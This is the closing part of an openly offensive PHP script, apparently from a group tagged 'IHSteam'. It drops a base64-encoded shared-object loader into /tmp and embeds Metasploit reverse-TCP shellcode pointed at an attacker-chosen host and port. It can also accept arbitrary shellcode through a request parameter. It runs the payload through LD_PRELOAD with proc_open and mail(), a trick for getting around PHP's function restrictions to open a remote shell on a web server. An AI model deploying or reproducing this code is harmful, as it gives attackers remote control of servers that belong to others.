  AAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA
  AAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA
  AAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ
  AAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA
  AAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA
  YAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD
  AAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf
  AAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS
  AAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA
  AAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j
  AAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA
  AAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA
  AAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA
  EADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA
  AAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf
  R0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0
  X3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf
  UmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w
  AF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x
  LjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==" ;
  }
  
  if (!function_exists('file_put_contents')){
  function file_put_contents($filename, $data){
  $f = @fopen($filename, 'w');
  if (!$f){
  return false;
  }
  else{
  $bytes = fwrite($f, $data);
  fclose($f);
  return $bytes;
  }
  }
  }
  
  // Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
  file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));
  $ip = gethostbyname($host);
  
  $port1 = sprintf('%c', ($port>> 8)&255);
  $port2 = sprintf('%c', ($port>> 0)&255);
  
  $part = explode('.', $ip);
  //$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
  $STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
  
  /*
   * linux/x86/shell_reverse_tcp - 71 bytes
   * http://www.metasploit.com
   * Encoder: generic/none
   * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,
   * PrependSetresuid=false, PrependSetreuid=false,
   * PrependSetuid=false, PrependChrootBreak=false,
   * AppendExit=false
   */
  
  
  $Xshellcode=
  "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80".
  "\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2."\x66\x53\x6a\x10".
  "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f".
  "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".
  "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00" ;
  
  if(isset($_REQUEST['shellcode'])){
  // just for fans of metasploit
  $Xshellcode=base64_decode($_REQUEST['shellcode']);
  }
  
  file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);
  
  $cwd = '/tmp/';
  $env = array('LD_PRELOAD' => '/tmp/shellcode.so');
  unset($var);
  
  $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));
  
  // BOOM
  proc_open('IHSteam', $descriptorspec, $var, $cwd, $env);
  mail("IHSteam","IHSteam","IHSteam","IHSteam");
  ?>